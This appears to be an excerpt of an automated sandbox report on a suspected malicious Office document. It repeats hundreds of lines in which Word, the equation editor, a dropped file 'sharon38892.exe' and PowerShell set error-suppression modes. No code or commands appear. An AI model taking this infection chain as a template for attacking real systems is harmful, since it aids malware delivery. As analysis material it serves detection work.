Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
